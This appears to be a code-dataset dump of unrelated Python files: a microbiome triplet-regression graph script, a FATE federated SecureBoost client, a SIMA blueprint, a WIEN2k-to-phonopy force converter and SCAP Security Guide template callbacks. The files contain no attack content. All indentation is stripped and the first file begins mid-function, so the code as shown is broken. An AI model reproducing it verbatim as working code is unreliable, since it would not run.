if ([resp,pred1,pred2] in computed) or ([resp,pred2,pred1] in computed):
continue
computed.append(order)
if not (temp.empty):
model = sm.ols(formula=text, data=temp).fit()
# Pick a threshold
# First get all F-stats for all 6 possible pair models within a triplet
sub_meta = fstats[
((fstats['Response'] == na[0]) & (fstats['Predictor'] == na[1])) |
((fstats['Response'] == na[0]) & (fstats['Predictor'] == na[2])) |
((fstats['Response'] == na[1]) & (fstats['Predictor'] == na[2])) |
((fstats['Response'] == na[1]) & (fstats['Predictor'] == na[0])) |
((fstats['Response'] == na[2]) & (fstats['Predictor'] == na[0])) |
((fstats['Response'] == na[2]) & (fstats['Predictor'] == na[1]))
]
# Now pick the smallest one
# It is now your threshold for letting the triplet model in
cut = min(sub_meta.ix[:, 'F_Stat'])
if model.f_pvalue < cut:
new_row = pd.DataFrame(
[resp, pred1, pred2, model.f_pvalue, model.params[pred1], model.params[pred2], model.params['Intercept']],
index=['Response', 'Predictor1', 'Predictor2', 'F_Stat', 'Coef_p1', 'Coef_p2', 'Intercept']).T
all_models = all_models.append(new_row)
poss_edges = itertools.combinations(ind, 2)
# Add weights to our graph
for el in poss_edges:
tr.add_weighted_edge(el[0], el[1], do)
# Finally, paint the seed vertex black: we are not coming back here
do.nodes[i].color = 'black'
# Remove zero-neighbor vertices
tr.nodes = [el for el in tr.nodes if len(el.neigh) > 1]
# Remove zero-weight edges from graph
for el in tr.nodes:
el.weight = {x: y for x, y in el.weight.items() if y > 0}
return (tr, all_models)
# in: graph for triplets
# out: adjacency table w/out weights
def turn_3_graph_to_adj_table(graph):
adj = []
for n in graph.nodes:
adj.append([n.name])
for el in n.neigh:
adj[-1] += [el.name]
return (adj)
# in: graph for triplets
# out: list of edges with weights
def turn_3_graph_to_edge_list(graph):
edges = []
for el in graph.nodes:
edges += [sorted([el.name, i.name]) + [el.weight[i]] for i in el.neigh]
temp = [i[0] + '\t' + i[1] + '\t' + str(i[2]) for i in edges]
temp = sorted(list(set(temp)))
return (temp)
def return_tax_names(ID_to_taxon, profiles):
tax_code = {}
profiles = pd.read_table(profiles, header=0, index_col=0, sep='\t', engine = 'python')
with open(ID_to_taxon) as f:
for line in f.read().splitlines():
temp = line.split()
# tax ID is in the 1st column tax name -- 2nd
tax_code[temp[0]] = temp[1]
profiles.index = [tax_code[x] for x in profiles.index]
return (profiles)
def code_tax_names(taxon_to_ID, profiles):
tax_code = {}
profiles = pd.read_table(profiles, header=0, index_col=0, sep='\t', engine = 'python')
with open(taxon_to_ID) as f:
for line in f.read().splitlines():
temp = line.split()
# tax ID is in the 1st column tax name -- 2nd
tax_code[temp[1]] = temp[0]
profiles.index = [tax_code[x] for x in profiles.index]
return (profiles)
def fstat_to_triplet_edges(pair_mod, counts, path_out):
# Make replacemens in data to avoid further confusion
# E.g. KEGG considers Ruminococcus to be in Ruminococcacea
# While Greengenes -- in Lachnospiraceae
def prepair_counts_and_edges(counts, pair_mod):
# counts.index = [re.sub(r'_x(\w+)x$', r'_\1', x) for x in counts.index]
# counts.index = [re.sub(r'_x(\w+)x(?=,)', r'_\1', x) for x in counts.index]
# counts.index = [re.sub(r'c__Erysipelotrichi$|c__Erysipelotrichi(?=,)', 'c__Erysipelotrichia', x) for x in
# counts.index]
# counts.index = [re.sub(r'f__Lachnospiraceae(?=,g__Ruminococcus)', 'f__Ruminococcaceae', x) for x in
# counts.index]
# pair_mod = pair_mod.replace({r'_x(\w+)x$': r'_\1'}, regex=True)
# pair_mod = pair_mod.replace({r'_x(\w+)x(?=,)': r'_\1'}, regex=True)
# pair_mod = pair_mod.replace({r'c__Erysipelotrichi$|c__Erysipelotrichi(?=,)': 'c__Erysipelotrichia'}, regex=True)
# pair_mod = pair_mod.replace({r'f__Lachnospiraceae(?=,g__Ruminococcus)': 'f__Ruminococcaceae'}, regex=True)
# Model calling can't work with commas or brackets in variable names
counts.index = [x.replace(',', '00') for x in counts.index]
counts = counts.T
pair_mod['Response'] = pair_mod['Response'].str.replace(',', '00')
pair_mod['Predictor'] = pair_mod['Predictor'].str.replace(',', '00')
return (counts, pair_mod)
with open(pair_mod) as f:
if f.readline() == 'No significant models\n':
fail = 'No pair models to base triple models on'
outfile = path_out + 'all_triplet_models.txt'
with open(outfile, 'w') as out:
out.write(fail)
return ()
a = pd.read_table(pair_mod, header=0, index_col=None, engine = 'python')
# NEW LINE!
counts, a = prepair_counts_and_edges(counts, a)
tr = reduce_to_triplets(a, counts)
out = turn_3_graph_to_edge_list(tr[0])
out = [i.replace('00', ',') for i in out]
model_table = tr[1]
model_table.index = range(0, model_table.shape[0])
model_table.drop(0, 0, inplace=True)
with open(path_out + 'triplet_edges.txt', 'a') as f:
for line in out:
f.write(line + '\n')
out_model = path_out + 'all_triplet_models.txt'
model_table = model_table[['Response', 'Predictor1', 'Predictor2', 'F_Stat', 'Coef_p1', 'Coef_p2', 'Intercept', ]]
model_table = model_table.replace(re.compile(r'(?<=\w)00(?=\w)'), ',')
model_table.to_csv(out_model, sep='\t', index=False)
return(model_table)
p_pair_edges = sys.argv[1]
p_counts = sys.argv[2]
tax_code = sys.argv[3]
p_out = sys.argv[4]
if p_out[-1] != '/':
p_out += '/'
# counts = return_taxonomies(p_counts, tax_code)
counts = return_tax_names(tax_code, p_counts)
x = fstat_to_triplet_edges(p_pair_edges, counts, p_out)
|
StarcoderdataPython
|
3300151
|
from federatedml.feature.fate_element_type import NoneType
from operator import itemgetter
from federatedml.param.evaluation_param import EvaluateParam
from federatedml.protobuf.generated.boosting_tree_model_meta_pb2 import BoostingTreeModelMeta
from federatedml.protobuf.generated.boosting_tree_model_meta_pb2 import ObjectiveMeta
from federatedml.protobuf.generated.boosting_tree_model_meta_pb2 import QuantileMeta
from federatedml.protobuf.generated.boosting_tree_model_param_pb2 import BoostingTreeModelParam
from federatedml.protobuf.generated.boosting_tree_model_param_pb2 import FeatureImportanceInfo
from federatedml.transfer_variable.transfer_class.homo_secure_boost_transfer_variable import \
HomoSecureBoostingTreeTransferVariable
from federatedml.util import consts
from federatedml.loss import SigmoidBinaryCrossEntropyLoss
from federatedml.loss import SoftmaxCrossEntropyLoss
from federatedml.loss import LeastSquaredErrorLoss
from federatedml.loss import HuberLoss
from federatedml.loss import LeastAbsoluteErrorLoss
from federatedml.loss import TweedieLoss
from federatedml.loss import LogCoshLoss
from federatedml.loss import FairLoss
from federatedml.tree import BoostingTree
from federatedml.tree import HomoDecisionTreeClient
from federatedml.tree import SecureBoostClientAggregator
from federatedml.feature.homo_feature_binning.homo_split_points import HomoFeatureBinningClient
import functools
from numpy import random
from typing import List, Tuple
import numpy as np
from arch.api.utils import log_utils
from federatedml.model_selection.k_fold import KFold
from federatedml.util.classify_label_checker import ClassifyLabelChecker, RegressionLabelChecker
LOGGER = log_utils.getLogger()
class HomoSecureBoostingTreeClient(BoostingTree):
def __init__(self):
super(HomoSecureBoostingTreeClient, self).__init__()
self.mode = consts.HOMO
self.validation_strategy = None
self.loss_fn = None
self.cur_sample_weights = None
self.y = None
self.y_hat = None
self.y_hat_predict = None
self.feature_num = None
self.num_classes = 2
self.tree_dim = 1
self.trees = []
self.feature_importance = {}
self.transfer_inst = HomoSecureBoostingTreeTransferVariable()
self.role = None
self.data_bin = None
self.bin_split_points = None
self.bin_sparse_points = None
self.init_score = None
self.local_loss_history = []
self.classes_ = []
self.role = consts.GUEST
# store learnt model param
self.tree_meta = None
self.learnt_tree_param = []
self.aggregator = SecureBoostClientAggregator()
self.binning_obj = HomoFeatureBinningClient()
def set_loss_function(self, objective_param):
loss_type = objective_param.objective
params = objective_param.params
LOGGER.info("set objective, objective is {}".format(loss_type))
if self.task_type == consts.CLASSIFICATION:
if loss_type == "cross_entropy":
if self.num_classes == 2:
self.loss_fn = SigmoidBinaryCrossEntropyLoss()
else:
self.loss_fn = SoftmaxCrossEntropyLoss()
else:
raise NotImplementedError("objective %s not supported yet" % (loss_type))
elif self.task_type == consts.REGRESSION:
if loss_type == "lse":
self.loss_fn = LeastSquaredErrorLoss()
elif loss_type == "lae":
self.loss_fn = LeastAbsoluteErrorLoss()
elif loss_type == "huber":
self.loss_fn = HuberLoss(params[0])
elif loss_type == "fair":
self.loss_fn = FairLoss(params[0])
elif loss_type == "tweedie":
self.loss_fn = TweedieLoss(params[0])
elif loss_type == "log_cosh":
self.loss_fn = LogCoshLoss()
else:
raise NotImplementedError("objective %s not supported yet" % loss_type)
else:
raise NotImplementedError("objective %s not supported yet" % loss_type)
def federated_binning(self, data_instance):
if self.use_missing:
binning_result = self.binning_obj.average_run(data_instances=data_instance,
bin_num=self.bin_num, abnormal_list=[NoneType()])
else:
binning_result = self.binning_obj.average_run(data_instances=data_instance,
bin_num=self.bin_num)
return self.binning_obj.convert_feature_to_bin(data_instance, binning_result)
def compute_local_grad_and_hess(self, y_hat):
loss_method = self.loss_fn
if self.task_type == consts.CLASSIFICATION:
grad_and_hess = self.y.join(y_hat, lambda y, f_val:\
(loss_method.compute_grad(y, loss_method.predict(f_val)),\
loss_method.compute_hess(y, loss_method.predict(f_val))))
else:
grad_and_hess = self.y.join(y_hat, lambda y, f_val:
(loss_method.compute_grad(y, f_val),
loss_method.compute_hess(y, f_val)))
return grad_and_hess
def compute_local_loss(self, y, y_hat):
LOGGER.info('computing local loss')
loss_method = self.loss_fn
if self.objective_param.objective in ["lse", "lae", "logcosh", "tweedie", "log_cosh", "huber"]:
# regression tasks
y_predict = y_hat
else:
# classification tasks
y_predict = y_hat.mapValues(lambda val: loss_method.predict(val))
loss = loss_method.compute_loss(y, y_predict)
return float(loss)
@staticmethod
def get_subtree_grad_and_hess(g_h, t_idx: int):
"""
Args:
g_h of g_h val
t_idx: tree index
Returns: grad and hess of sub tree
"""
LOGGER.info("get grad and hess of tree {}".format(t_idx))
grad_and_hess_subtree = g_h.mapValues(
lambda grad_and_hess: (grad_and_hess[0][t_idx], grad_and_hess[1][t_idx]))
return grad_and_hess_subtree
def sample_valid_feature(self):
if self.feature_num is None:
self.feature_num = self.bin_split_points.shape[0]
chosen_feature = random.choice(range(0, self.feature_num), \
max(1, int(self.subsample_feature_rate * self.feature_num)), replace=False)
valid_features = [False for i in range(self.feature_num)]
for fid in chosen_feature:
valid_features[fid] = True
return valid_features
@staticmethod
def add_y_hat(f_val, new_f_val, lr=0.1, idx=0):
f_val[idx] += lr * new_f_val
return f_val
def update_y_hat_val(self, new_val=None, mode='train', tree_idx=0):
LOGGER.debug('update y_hat value, current tree is {}'.format(tree_idx))
add_func = functools.partial(self.add_y_hat, lr=self.learning_rate, idx=tree_idx)
if mode == 'train':
self.y_hat = self.y_hat.join(new_val, add_func)
else:
self.y_hat_predict = self.y_hat_predict.join(new_val, add_func)
def update_feature_importance(self, tree_feature_importance):
for fid in tree_feature_importance:
if fid not in self.feature_importance:
self.feature_importance[fid] = 0
self.feature_importance[fid] += tree_feature_importance[fid]
def sync_feature_num(self):
self.transfer_inst.feature_number.remote(self.feature_num, role=consts.ARBITER, idx=-1, suffix=('feat_num', ))
def sync_local_loss(self, cur_loss: float, sample_num: int, suffix):
data = {'cur_loss': cur_loss, 'sample_num': sample_num}
self.transfer_inst.loss_status.remote(data, role=consts.ARBITER, idx=-1, suffix=suffix)
LOGGER.debug('loss status sent')
def sync_tree_dim(self, tree_dim: int):
self.transfer_inst.tree_dim.remote(tree_dim,suffix=('tree_dim', ))
LOGGER.debug('tree dim sent')
def sync_stop_flag(self, suffix) -> bool:
flag = self.transfer_inst.stop_flag.get(idx=0,suffix=suffix)
return flag
def check_labels(self, data_inst, ) -> List[int]:
LOGGER.debug('checking labels')
classes_ = None
if self.task_type == consts.CLASSIFICATION:
num_classes, classes_ = ClassifyLabelChecker.validate_label(data_inst)
else:
RegressionLabelChecker.validate_label(data_inst)
return classes_
def generate_flowid(self, round_num, tree_num):
LOGGER.info("generate flowid, flowid {}".format(self.flowid))
return ".".join(map(str, [self.flowid, round_num, tree_num]))
def label_alignment(self, labels: List[int]):
self.transfer_inst.local_labels.remote(labels, suffix=('label_align', ))
def get_valid_features(self, epoch_idx, t_idx):
valid_feature = self.transfer_inst.valid_features.get(idx=0, suffix=('valid_features', epoch_idx, t_idx))
return valid_feature
def fit(self, data_inst, validate_data = None,):
# binning
data_inst = self.data_alignment(data_inst)
self.data_bin, self.bin_split_points, self.bin_sparse_points = self.federated_binning(data_inst)
# fid mapping
self.gen_feature_fid_mapping(data_inst.schema)
# set feature_num
self.feature_num = self.bin_split_points.shape[0]
# sync feature num
self.sync_feature_num()
# initialize validation strategy
self.validation_strategy = self.init_validation_strategy(train_data=data_inst, validate_data=validate_data,)
# check labels
local_classes = self.check_labels(self.data_bin)
# sync label class and set y
if self.task_type == consts.CLASSIFICATION:
self.transfer_inst.local_labels.remote(local_classes, role=consts.ARBITER, suffix=('label_align', ))
new_label_mapping = self.transfer_inst.label_mapping.get(idx=0, suffix=('label_mapping', ))
self.classes_ = [new_label_mapping[k] for k in new_label_mapping]
# set labels
self.num_classes = len(new_label_mapping)
LOGGER.debug('num_classes is {}'.format(self.num_classes))
self.y = self.data_bin.mapValues(lambda instance: new_label_mapping[instance.label])
# set tree dimension
self.tree_dim = self.num_classes if self.num_classes > 2 else 1
else:
self.y = self.data_bin.mapValues(lambda instance: instance.label)
# set loss function
self.set_loss_function(self.objective_param)
# set y_hat_val
self.y_hat, self.init_score = self.loss_fn.initialize(self.y) if self.tree_dim == 1 else \
self.loss_fn.initialize(self.y, self.tree_dim)
for epoch_idx in range(self.num_trees):
g_h = self.compute_local_grad_and_hess(self.y_hat)
for t_idx in range(self.tree_dim):
valid_features = self.get_valid_features(epoch_idx, t_idx)
LOGGER.debug('valid features are {}'.format(valid_features))
subtree_g_h = self.get_subtree_grad_and_hess(g_h, t_idx)
flow_id = self.generate_flowid(epoch_idx, t_idx)
new_tree = HomoDecisionTreeClient(self.tree_param, self.data_bin, self.bin_split_points,
self.bin_sparse_points, subtree_g_h, valid_feature=valid_features
, epoch_idx=epoch_idx, role=self.role, flow_id=flow_id, tree_idx=\
t_idx, mode='train')
new_tree.fit()
# update y_hat_val
self.update_y_hat_val(new_val=new_tree.sample_weights, mode='train', tree_idx=t_idx)
self.trees.append(new_tree)
self.tree_meta, new_tree_param = new_tree.get_model()
self.learnt_tree_param.append(new_tree_param)
self.update_feature_importance(new_tree.get_feature_importance())
# sync loss status
loss = self.compute_local_loss(self.y, self.y_hat)
LOGGER.debug('local loss of epoch {} is {}'.format(epoch_idx, loss))
self.local_loss_history.append(loss)
self.aggregator.send_local_loss(loss, self.data_bin.count(), suffix=(epoch_idx,))
# validate
if self.validation_strategy:
self.validation_strategy.validate(self, epoch_idx)
# check stop flag if n_iter_no_change is True
if self.n_iter_no_change:
should_stop = self.aggregator.get_converge_status(suffix=(str(epoch_idx), ))
LOGGER.debug('got stop flag {}'.format(should_stop))
if should_stop:
LOGGER.debug('stop triggered')
break
LOGGER.debug('fitting tree {}/{}'.format(epoch_idx, self.num_trees))
LOGGER.debug('fitting homo decision tree done')
def predict(self, data_inst):
to_predict_data = self.data_alignment(data_inst)
init_score = self.init_score
self.y_hat_predict = data_inst.mapValues(lambda x: init_score)
round_num = len(self.learnt_tree_param) // self.tree_dim
idx = 0
for round_idx in range(round_num):
for tree_idx in range(self.tree_dim):
tree_inst = HomoDecisionTreeClient(tree_param=self.tree_param, mode='predict')
tree_inst.load_model(model_meta=self.tree_meta, model_param=self.learnt_tree_param[idx])
idx += 1
predict_val = tree_inst.predict(to_predict_data)
self.update_y_hat_val(predict_val, mode='predict', tree_idx=tree_idx)
predict_result = None
if self.task_type == consts.REGRESSION and \
self.objective_param.objective in ["lse", "lae", "huber", "log_cosh", "fair", "tweedie"]:
predict_result = to_predict_data.join(self.y_hat_predict,
lambda inst, pred: [inst.label, float(pred), float(pred),
{"label": float(pred)}])
elif self.task_type == consts.CLASSIFICATION:
classes_ = self.classes_
loss_func = self.loss_fn
if self.num_classes == 2:
predicts = self.y_hat_predict.mapValues(lambda f: float(loss_func.predict(f)))
threshold = self.predict_param.threshold
predict_result = to_predict_data.join(predicts, lambda inst, pred: [inst.label,
classes_[1] if pred > threshold else
classes_[0], pred,
{"0": 1 - pred, "1": pred}])
else:
predicts = self.y_hat_predict.mapValues(lambda f: loss_func.predict(f).tolist())
predict_result = to_predict_data.join(predicts, lambda inst, preds: [inst.label,\
classes_[np.argmax(preds)], np.max(preds), dict(zip(map(str, classes_), preds))])
return predict_result
def get_feature_importance(self):
return self.feature_importance
def get_model_meta(self):
model_meta = BoostingTreeModelMeta()
model_meta.tree_meta.CopyFrom(self.tree_meta)
model_meta.learning_rate = self.learning_rate
model_meta.num_trees = self.num_trees
model_meta.quantile_meta.CopyFrom(QuantileMeta(bin_num=self.bin_num))
model_meta.objective_meta.CopyFrom(ObjectiveMeta(objective=self.objective_param.objective,
param=self.objective_param.params))
model_meta.task_type = self.task_type
model_meta.n_iter_no_change = self.n_iter_no_change
model_meta.tol = self.tol
meta_name = "HomoSecureBoostingTreeGuestMeta"
return meta_name, model_meta
def set_model_meta(self, model_meta):
self.tree_meta = model_meta.tree_meta
self.learning_rate = model_meta.learning_rate
self.num_trees = model_meta.num_trees
self.bin_num = model_meta.quantile_meta.bin_num
self.objective_param.objective = model_meta.objective_meta.objective
self.objective_param.params = list(model_meta.objective_meta.param)
self.task_type = model_meta.task_type
self.n_iter_no_change = model_meta.n_iter_no_change
self.tol = model_meta.tol
def get_model_param(self):
model_param = BoostingTreeModelParam()
model_param.tree_num = len(list(self.learnt_tree_param))
model_param.tree_dim = self.tree_dim
model_param.trees_.extend(self.learnt_tree_param)
model_param.init_score.extend(self.init_score)
model_param.losses.extend(self.local_loss_history)
model_param.classes_.extend(map(str, self.classes_))
model_param.num_classes = self.num_classes
model_param.best_iteration = -1
feature_importance = list(self.get_feature_importance().items())
feature_importance = sorted(feature_importance, key=itemgetter(1), reverse=True)
feature_importance_param = []
for fid, _importance in feature_importance:
feature_importance_param.append(FeatureImportanceInfo(sitename=self.role,
fid=fid,
importance=_importance))
model_param.feature_importances.extend(feature_importance_param)
model_param.feature_name_fid_mapping.update(self.feature_name_fid_mapping)
param_name = "HomoSecureBoostingTreeGuestParam"
return param_name, model_param
def get_cur_model(self):
meta_name, meta_protobuf = self.get_model_meta()
param_name, param_protobuf = self.get_model_param()
return {meta_name: meta_protobuf,
param_name: param_protobuf
}
def set_model_param(self, model_param):
self.learnt_tree_param = list(model_param.trees_)
self.init_score = np.array(list(model_param.init_score))
self.local_loss_history = list(model_param.losses)
self.classes_ = list(model_param.classes_)
self.tree_dim = model_param.tree_dim
self.num_classes = model_param.num_classes
self.feature_name_fid_mapping.update(model_param.feature_name_fid_mapping)
def get_metrics_param(self):
if self.task_type == consts.CLASSIFICATION:
if self.num_classes == 2:
return EvaluateParam(eval_type="binary",
pos_label=self.classes_[1], metrics=self.metrics)
else:
return EvaluateParam(eval_type="multi", metrics=self.metrics)
else:
return EvaluateParam(eval_type="regression", metrics=self.metrics)
def export_model(self):
if self.need_cv:
return None
return self.get_cur_model()
def load_model(self, model_dict):
model_param = None
model_meta = None
for _, value in model_dict["model"].items():
for model in value:
if model.endswith("Meta"):
model_meta = value[model]
if model.endswith("Param"):
model_param = value[model]
LOGGER.info("load model")
self.set_model_meta(model_meta)
self.set_model_param(model_param)
self.set_loss_function(self.objective_param)
def cross_validation(self, data_instances):
if not self.need_run:
return data_instances
kflod_obj = KFold()
cv_param = self._get_cv_param()
kflod_obj.run(cv_param, data_instances, self, True)
return data_instances
|
StarcoderdataPython
|
6553748
|
#
# Generated with SNCurveItemBlueprint
from dmt.blueprint import Blueprint
from dmt.dimension import Dimension
from dmt.attribute import Attribute
from dmt.enum_attribute import EnumAttribute
from dmt.blueprint_attribute import BlueprintAttribute
from sima.sima.blueprints.moao import MOAOBlueprint
class SNCurveItemBlueprint(MOAOBlueprint):
""""""
def __init__(self, name="SNCurveItem", package_path="sima/post", description=""):
super().__init__(name,package_path,description)
self.attributes.append(Attribute("name","string","",default=""))
self.attributes.append(Attribute("description","string","",default=""))
self.attributes.append(Attribute("_id","string","",default=""))
self.attributes.append(BlueprintAttribute("scriptableValues","sima/sima/ScriptableValue","",True,Dimension("*")))
self.attributes.append(Attribute("negativeInverseSlope","number","Negative inverse slope of S-N curve",default=0.0))
self.attributes.append(Attribute("transitionPointLog","number","log10 of number of cycles at transition point between preceding curve segment and this curve segment",default=0.0))
|
StarcoderdataPython
|
6577440
|
#!/usr/bin/env python
from scipy import *
from scipy.linalg import *
import utils
import os, re, sys
def Print(Us):
for i in range(shape(Us)[0]):
print ' ',
for j in range(shape(Us)[1]):
print "%11.8f " % Us[i,j],
print
def Get_BR1_DIR(case):
file = case+'.outputd'
found = False
if os.path.exists(file) and os.path.getsize(file)>0:
fi = open(file,'r')
lines = fi.readlines()
for il,line in enumerate(lines):
if re.search('BR1_DIR',line):
found = True
break
if found:
a1 = map(float,lines[il+1].split())
a2 = map(float,lines[il+2].split())
a3 = map(float,lines[il+3].split())
return vstack( (a1,a2,a3) ).transpose()
file = case+'.rotlm'
if os.path.exists(file) and os.path.getsize(file)>0:
fi = open(file,'r')
fi.next()
b1 = map(float, fi.next().split())
b2 = map(float, fi.next().split())
b3 = map(float, fi.next().split())
BR1 = vstack( (b1,b2,b3) )
S2C = inv(BR1)*2*pi
return S2C
def read_POSCAR(file):
fi = open(file, 'r')
fi.next()
a = float(fi.next().split()[0])
a1 = map(float, fi.next().split())
a2 = map(float, fi.next().split())
a3 = map(float, fi.next().split())
vaspbasis = vstack( (a1,a2,a3) ).transpose()
return vaspbasis
def read_w2k_disp(strfile):
fi = open(strfile, 'r')
for i in range(4):
fi.next()
line = fi.next() # should be first atoms
# Here we assume that the first atom is displaced away from (0,0,0).
# This should be generalized!
ii = int(line[4:8])
disp = zeros(3)
for i,col in enumerate(12+13*arange(3)):
disp[i] = float( line[col:col+10])
return disp
def read_disp_yaml(filename):
fi = open(filename, 'r')
lines = fi.readlines()
nat = int(lines[0].split()[1])
disp=[]
iat_disp=[]
c=2
for i in range(nat):
iat = lines[c].split()[2]
vdir = eval(lines[c+2])
vdis = eval(lines[c+4])
disp.append( vdis )
iat_disp.append(iat)
c += 5
if lines[c][:6] != '- atom': break
if lines[c][:7] != 'lattice':
print 'Something wrong reading', filename
c+=1
vaspbasis=zeros((3,3))
for i in range(3):
ai = eval(lines[c+i][2:])
vaspbasis[i,:] = array(ai)
vaspbasis = vaspbasis.transpose()
return (vaspbasis, disp)
def grepForce(filename):
fi = open(filename, 'r')
lines = fi.readlines()
if lines[-1][:7]!=':FCHECK':
print 'ERROR: ', filename, 'does not contain forces at the end'
frl = [] # forces in lattice basis
c=2
for i in range(2,1000):
c+=1
if lines[-i][:4]!=':FGL':
break
frl.append( map(float,lines[-i].split()[2:5]) )
frl = frl[::-1]
frc=[] # forces in cartesian basis
for i in range(c,1000):
if lines[-i][:4]!=':FCA':
break
frc.append( map(float,lines[-i].split()[2:5]) )
frc = frc[::-1]
return [array(frc), array(frl)]
au_2_angs = 0.52917721067
Ry2eV = 13.605693009
if __name__ == '__main__':
POSCAR_file = 'POSCAR-001'
(vaspbasis, dispVasp) = read_disp_yaml('disp.yaml')
w2k = utils.W2kEnvironment()
S2C = Get_BR1_DIR(w2k.case)
print 'S2C='
Print(S2C)
S2C *= au_2_angs
#vaspbasis = read_POSCAR(POSCAR_file)
Vw2k = det(S2C)
Vvasp = det(vaspbasis)
print 'Volume of wien2k primitive cell is %10.4f' % Vw2k
print 'Volume of vasp primitive cell is %10.4f' % Vvasp
if abs(Vw2k/Vvasp-1.)/Vw2k > 1e-4:
print 'ERROR : Volumes of the two unit cells are very different'
sys.exit(1)
# This transformation takes a vector expressed in cartesian coordinates in w2k and transforms it to
# cartesian coordinates in Vasp.
# Note that if vector is expressed in lattice vectors (call it r), than we just apply vaspbasis*r
M = dot(vaspbasis, inv(S2C) )
print "rotation matrix from w2kbasis_BR1 to vaspbasis is"
Print(M)
detM = det(M)
print 'and its determinant is', detM
print 'check of unitarity : '
Print( dot(M.T,M) )
force,forcel = grepForce(w2k.case+'.scf')
print 'force in cartesian coordinates extracted from case.scf file :'
Print(force)
disp = read_w2k_disp(w2k.case+'.struct') # This must be generalized
print 'Displacement extracted from case.struct file', disp
disp_w2k = dot(S2C, disp) # to cartesian coordinates
dispVasp0 = dot(M,disp_w2k) # to Vasp lattice coordinates
#print "Unrotated displacement vector in w2k in Ang"
#print disp_w2k, 'norm is', norm(disp_w2k)
print 'Converted w2k displacement to Vasp basis is [Ang]:', "%12.8f "*3 % tuple(dispVasp0)
print 'Correct Vasp displacement from disp.yaml :', "%12.8f "*3 % tuple(dispVasp[0])
#w2k_cartesian_force = zeros( shape(forcel) )
#a=S2C[2,2]
#S2C_normalized = S2C/a
#for i in range(len(forcel)):
# w2k_cartesian_force[i] = dot(S2C_normalized, forcel[i])
#print 'w2k fore converted to cartesian coordinates:'
#Print(w2k_cartesian_force) # should be equal to force
# change to Vasp units
mRy_au_2_ev_ang = Ry2eV/1000./(au_2_angs)
force *= mRy_au_2_ev_ang
Vasp_force = zeros( shape(force) )
for i in range(len(force)):
Vasp_force[i] = dot(M, force[i])
print 'w2k forces in vaspbasis are in ev/Ang'
Print(Vasp_force)
fo = open('FORCE_SETS', 'w')
print >> fo, len(force)
print >> fo, '1'
print >> fo
print >> fo, len(dispVasp)
for i in range(len(dispVasp)):
print >> fo, '%15.8f '*3 % tuple(dispVasp[i])
for i in range(len(force)):
print >> fo, '%15.8f '*3 % tuple(Vasp_force[i])
fo.close()
|
StarcoderdataPython
|
193316
|
from __future__ import print_function
import os
import sys
import re
import ssg.build_yaml
languages = ["anaconda", "ansible", "bash", "oval", "puppet", "ignition"]
lang_to_ext_map = {
"anaconda": ".anaconda",
"ansible": ".yml",
"bash": ".sh",
"oval": ".xml",
"puppet": ".pp",
"ignition": ".yml"
}
def sanitize_input(string):
return re.sub(r'[\W_]', '_', string)
templates = dict()
def template(langs):
def decorator_template(func):
func.langs = langs
templates[func.__name__] = func
return func
return decorator_template
# Callback functions for processing template parameters and/or validating them
@template(["ansible", "bash", "oval"])
def accounts_password(data, lang):
if lang == "oval":
data["sign"] = "-?" if data["variable"].endswith("credit") else ""
return data
@template(["ansible", "bash", "oval"])
def auditd_lineinfile(data, lang):
missing_parameter_pass = data["missing_parameter_pass"]
if missing_parameter_pass == "true":
missing_parameter_pass = True
elif missing_parameter_pass == "false":
missing_parameter_pass = False
data["missing_parameter_pass"] = missing_parameter_pass
return data
@template(["ansible", "bash", "oval"])
def audit_rules_dac_modification(data, lang):
return data
@template(["ansible", "bash", "oval"])
def audit_rules_file_deletion_events(data, lang):
return data
@template(["ansible", "bash", "oval"])
def audit_rules_login_events(data, lang):
path = data["path"]
name = re.sub(r'[-\./]', '_', os.path.basename(os.path.normpath(path)))
data["name"] = name
if lang == "oval":
data["path"] = path.replace("/", "\\/")
return data
@template(["ansible", "bash", "oval"])
def audit_rules_path_syscall(data, lang):
if lang == "oval":
pathid = re.sub(r'[-\./]', '_', data["path"])
# remove root slash made into '_'
pathid = pathid[1:]
data["pathid"] = pathid
return data
@template(["ansible", "bash", "oval"])
def audit_rules_privileged_commands(data, lang):
path = data["path"]
name = re.sub(r"[-\./]", "_", os.path.basename(path))
data["name"] = name
if lang == "oval":
data["id"] = data["_rule_id"]
data["title"] = "Record Any Attempts to Run " + name
data["path"] = path.replace("/", "\\/")
return data
@template(["ansible", "bash", "oval"])
def audit_rules_unsuccessful_file_modification(data, lang):
return data
@template(["oval"])
def audit_rules_unsuccessful_file_modification_o_creat(data, lang):
return data
@template(["oval"])
def audit_rules_unsuccessful_file_modification_o_trunc_write(data, lang):
return data
@template(["oval"])
def audit_rules_unsuccessful_file_modification_rule_order(data, lang):
return data
@template(["ansible", "bash", "oval"])
def audit_rules_usergroup_modification(data, lang):
path = data["path"]
name = re.sub(r'[-\./]', '_', os.path.basename(path))
data["name"] = name
if lang == "oval":
data["path"] = path.replace("/", "\\/")
return data
def _file_owner_groupowner_permissions_regex(data):
data["is_directory"] = data["filepath"].endswith("/")
if "missing_file_pass" not in data:
data["missing_file_pass"] = False
if "file_regex" in data and not data["is_directory"]:
raise ValueError(
"Used 'file_regex' key in rule '{0}' but filepath '{1}' does not "
"specify a directory. Append '/' to the filepath or remove the "
"'file_regex' key.".format(data["_rule_id"], data["filepath"]))
@template(["ansible", "bash", "oval"])
def file_groupowner(data, lang):
_file_owner_groupowner_permissions_regex(data)
if lang == "oval":
data["fileid"] = data["_rule_id"].replace("file_groupowner", "")
return data
@template(["ansible", "bash", "oval"])
def file_owner(data, lang):
_file_owner_groupowner_permissions_regex(data)
if lang == "oval":
data["fileid"] = data["_rule_id"].replace("file_owner", "")
return data
@template(["ansible", "bash", "oval"])
def file_permissions(data, lang):
_file_owner_groupowner_permissions_regex(data)
if lang == "oval":
data["fileid"] = data["_rule_id"].replace("file_permissions", "")
# build the state that describes our mode
# mode_str maps to STATEMODE in the template
mode = data["filemode"]
fields = [
'oexec', 'owrite', 'oread', 'gexec', 'gwrite', 'gread',
'uexec', 'uwrite', 'uread', 'sticky', 'sgid', 'suid']
mode_int = int(mode, 8)
mode_str = ""
for field in fields:
if mode_int & 0x01 == 1:
mode_str = (
" <unix:" + field + " datatype=\"boolean\">true</unix:"
+ field + ">\n" + mode_str)
else:
mode_str = (
" <unix:" + field + " datatype=\"boolean\">false</unix:"
+ field + ">\n" + mode_str)
mode_int = mode_int >> 1
data["statemode"] = mode_str
return data
@template(["ansible", "bash", "oval"])
def grub2_bootloader_argument(data, lang):
data["arg_name_value"] = data["arg_name"] + "=" + data["arg_value"]
return data
@template(["ansible", "bash", "oval"])
def kernel_module_disabled(data, lang):
return data
